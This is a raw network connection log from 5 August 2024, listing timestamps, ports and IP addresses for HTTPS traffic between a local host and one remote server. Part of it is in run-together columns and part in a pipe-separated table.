Aug 5, 2024 18:56:13.887608051 CEST  443          49727      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:13.887676954 CEST  443          49727      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:13.887710094 CEST  443          49727      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:13.887731075 CEST  49727        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:13.887731075 CEST  49727        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:13.887757063 CEST  49727        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:13.887887001 CEST  49727        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:13.887900114 CEST  443          49727      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:14.139015913 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:14.139091015 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:14.139173985 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:14.139544010 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:14.139559984 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:14.802336931 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:14.802464008 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:14.803208113 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:14.803219080 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:14.804909945 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:14.804914951 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.131660938 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.131719112 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.131758928 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.131759882 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.131772995 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.131789923 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.131817102 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.131838083 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.158343077 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.158401966 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.158520937 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.158520937 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.158533096 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.158582926 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.471321106 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.471344948 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.471388102 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.471510887 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.471510887 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.471534014 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.471570969 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.472275972 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.472318888 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.472343922 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.472349882 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.472377062 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.472398043 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.476267099 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.476321936 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.476443052 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.476449966 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.476466894 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.476491928 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.476517916 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.476751089 CEST  49728        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.476763964 CEST  443          49728      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.738866091 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.738905907 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:15.739001036 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.739304066 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:15.739314079 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.411609888 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.411777020 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.412528038 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.412533998 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.414086103 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.414091110 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.840749025 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.840806007 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.840842009 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.840848923 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.841001034 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.841001034 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.841012955 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.841054916 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.873009920 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.873055935 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.873119116 CEST  49729        443        192.168.2.5     188.245.87.202
Aug 5, 2024 18:56:16.873133898 CEST  443          49729      188.245.87.202  192.168.2.5
Aug 5, 2024 18:56:16.873269081 CEST  49729        443        192.168.2.5     188.245.87.202
                                                                        Aug 5, 2024 18:56:16.873269081 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:16.937616110 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:16.937668085 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:16.937761068 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:16.937783957 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:16.937813997 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:16.937834978 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:16.964875937 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:16.964920998 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:16.964956045 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:16.964962006 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:16.965002060 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.003515005 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.003559113 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.003628969 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.003638029 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.003683090 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.003729105 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.027477026 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.027515888 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.027589083 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.027602911 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.027697086 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.048845053 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.048887968 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.048957109 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.048971891 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.049027920 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.063822031 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.063865900 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.063916922 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.063936949 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.063950062 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.063977957 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.095200062 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.095242977 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.095305920 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.095321894 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.095346928 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.095439911 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.105720043 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.105762959 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.105788946 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.105802059 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.105827093 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.105840921 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.112040997 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.112082958 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.112114906 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.112127066 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.112145901 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.112160921 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.128309965 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.128349066 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.128375053 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.128386974 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.128396988 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.128423929 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.140990973 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.141031027 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.141074896 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.141087055 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.141097069 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.141120911 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.149461985 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.149502039 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.149529934 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.149542093 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.149553061 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.149580002 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.194876909 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.194921017 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.194945097 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.194960117 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.194971085 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.194988966 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.195597887 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.195638895 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.195676088 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.195683002 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.195700884 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.195713997 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.196419954 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.196463108 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.196489096 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.196496964 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.196517944 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.196532965 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.200912952 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.200953960 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.200973988 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.200983047 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.201001883 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.201020002 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.202632904 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.202691078 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.202701092 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.202718019 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.202738047 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.202753067 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.209598064 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.209641933 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.209662914 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.209675074 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.209691048 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.209702969 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.227700949 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.227741003 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.227777958 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.227792025 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.227802992 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.227828026 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.235404015 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.235457897 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.235491991 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.235506058 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.235538960 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.235548973 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.243906975 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.243952990 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.244059086 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.244074106 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.244111061 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.273648024 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.273691893 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.273741961 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.273761988 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.273796082 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.273818016 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.274741888 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.274796963 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.274807930 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.274826050 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.274857044 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.274888992 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.276068926 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.276108980 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.276145935 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.276153088 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.276201010 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.276221037 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.278851986 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.278888941 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.278937101 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.278945923 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.278985023 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.279000998 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.296988964 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.297032118 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.297065020 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.297080040 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.297105074 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.297120094 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.314963102 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.315001965 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.315042973 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.315057993 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.315069914 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.315094948 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.322694063 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.322735071 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.322792053 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.322803974 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.322860956 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.322861910 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.331913948 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.331954002 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.332005024 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.332015991 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.332045078 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.332062006 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.370155096 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.370197058 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.370237112 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.370250940 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.370274067 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.370294094 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.371223927 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.371260881 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.371282101 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.371288061 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.371315956 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.371332884 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.372076035 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.372116089 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.372147083 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.372152090 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.372172117 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.372191906 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.373131990 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.373179913 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.373203039 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.373208046 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.373229027 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.373246908 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:17.385787964 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:17.385829926 CEST44349729188.245.87.202192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2024 18:56:17.385909081 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.385930061 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.385961056 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.385972023 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.404639959 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.404690981 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.404722929 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.404731989 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.404761076 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.404779911 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.410635948 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.410677910 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.410722017 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.410727978 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.410753012 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.410773993 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.425589085 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.425633907 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.425692081 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.425699949 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.425729990 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.425749063 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.454487085 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.454530001 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.454579115 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.454587936 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.454617977 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.454638958 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.455472946 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.455513954 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.455671072 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.455677986 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.455728054 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.456343889 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.456422091 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.456423044 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.456446886 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.456475019 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.456502914 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.459440947 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.459481955 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.459528923 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.459533930 CEST | 443 | 49729 | 188.245.87.202 | 192.168.2.5
Aug 5, 2024 18:56:17.459568024 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
Aug 5, 2024 18:56:17.459589958 CEST | 49729 | 443 | 192.168.2.5 | 188.245.87.202
